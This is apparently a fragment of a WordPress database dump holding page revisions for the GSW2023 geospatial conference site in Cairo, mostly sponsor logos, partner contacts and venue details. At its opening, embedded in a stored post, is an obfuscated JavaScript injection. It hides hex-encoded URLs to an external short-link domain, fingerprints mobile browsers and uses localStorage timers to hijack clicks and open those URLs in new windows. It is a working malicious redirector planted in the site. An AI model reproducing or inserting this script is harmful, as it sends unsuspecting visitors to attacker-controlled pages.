_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:15:16','2023-08-15 23:15:16','',3066,'https://gsw2023.com/?p=5215',0,'revision','',0),
(5216,1,'2023-08-15 23:18:44','2023-08-15 23:18:44','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 